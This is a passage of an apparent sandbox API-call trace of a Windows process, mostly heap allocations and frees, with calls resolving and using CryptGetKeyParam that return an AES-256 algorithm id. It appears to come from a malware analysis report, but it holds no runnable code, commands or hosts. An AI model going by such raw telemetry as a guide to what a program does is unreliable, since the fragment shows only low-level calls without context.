RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0091.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0091.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0091.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0091.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0091.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0091.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0091.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0091.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0091.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0091.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0091.259] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0091.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0091.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0091.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0091.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0091.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0091.259] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0091.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0091.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0091.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0091.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0091.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0091.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0091.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0091.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0091.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0091.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0091.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0091.259] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0091.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0091.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0091.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0091.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25d0 [0091.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0091.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0091.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0091.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0091.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3d0 [0091.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0091.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0091.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0091.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0091.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0091.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0091.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0091.260] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0091.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0091.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0091.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0091.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0091.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0091.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0091.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0091.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0091.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0091.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0091.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0091.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0091.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0091.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0091.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0091.261] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0091.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0091.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0091.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0091.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0091.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0091.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0091.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0091.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0091.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0091.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0091.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0091.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0091.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0091.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0091.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0091.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0091.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0091.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0091.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0091.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0091.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0091.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0091.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0091.262] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0091.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0091.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0091.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0091.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0091.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0091.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0091.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0091.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0091.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0091.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0091.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0091.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f88 [0091.262] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0091.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f88 | out: hHeap=0x1780000) returned 1 [0091.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0091.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca190 [0091.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0091.263] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0091.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0091.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0091.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0091.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0091.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0091.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0091.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0091.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0091.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0091.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0091.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0091.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0091.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0091.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0091.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0091.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0091.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0091.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0091.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0091.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0091.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0091.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0091.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0091.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0091.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0091.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0091.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0091.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0091.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0091.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0091.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0091.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0091.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0091.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0091.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0091.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0091.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0091.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d88 [0091.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0091.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0091.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0091.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0091.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0091.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0091.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0091.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0091.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0091.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0091.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0091.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0091.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0091.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0091.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0091.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0091.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0091.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0091.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0091.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0091.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0091.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0091.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0091.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0091.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0091.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0091.267] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0091.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0091.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0091.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0091.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0091.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0091.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0091.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0091.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0091.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0091.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0091.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0091.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0091.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0091.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0091.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0091.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0091.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0091.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0091.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0091.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0091.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0091.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0091.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0091.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0091.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0091.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0091.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0091.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0091.268] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0091.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0091.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0091.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0091.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0091.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0091.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0091.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0091.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0091.269] CryptGetKeyParam (in: hKey=0x41ac000, dwParam=0x7, pbData=0x43e26e0, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e26e0*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0091.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0091.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0091.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0091.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0091.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0091.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0091.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0091.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0091.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0091.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0091.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0091.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0091.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0091.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0091.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0091.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0091.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0091.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0091.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0091.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0091.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0091.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0091.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0091.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0091.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0091.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0091.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0091.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0091.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0091.270] HeapFree (in: hHeap=0x1780000, 